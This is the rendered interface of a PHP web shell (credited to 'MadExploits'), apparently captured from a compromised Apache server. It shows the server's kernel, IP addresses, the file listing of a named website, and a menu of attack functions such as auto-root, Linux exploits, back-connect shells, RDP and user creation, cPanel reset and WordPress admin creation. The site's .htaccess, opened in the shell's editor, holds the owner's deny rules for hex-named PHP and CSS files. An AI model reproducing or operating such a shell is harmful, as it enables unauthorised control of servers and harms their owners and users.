Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 3.137.210.13
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
afra /
web-design.rampagesoft.com /
[ HOME SHELL ]
Name
Size
Permission
Action
my-app
[ DIR ]
drwxr-xr-x
static
[ DIR ]
drwxr-xr-x
.htaccess
969
B
-rwxr-xr-x
index.html
5.99
KB
-rwxr-xr-x
robots.txt
67
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / # Redirect from https://web-design.rampagesoft.com/ to https://www.rampagesoft.com/webdesign/ RewriteCond %{HTTP_HOST} ^web-design\.rampagesoft\.com$ [NC] RewriteRule ^(.*)$ https://www.rampagesoft.com/webdesign/$1 [L,R=301] RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # บล็อกไฟล์ PHP ทั้งหมด <FilesMatch "^[a-f0-9]{8}\.php$"> Order Allow,Deny Deny from all </FilesMatch> # บล็อกไฟล์ CSS ที่มีชื่อเป็นตัวเลข hex 8 หลัก <FilesMatch ".*/[a-f0-9]{8}\.css"> Order Allow,Deny Deny from all </FilesMatch> # บล็อกไฟล์ที่มีนามสกุล ".ccss" <FilesMatch "\.ccss$"> Order Allow,Deny Deny from all </FilesMatch>
Close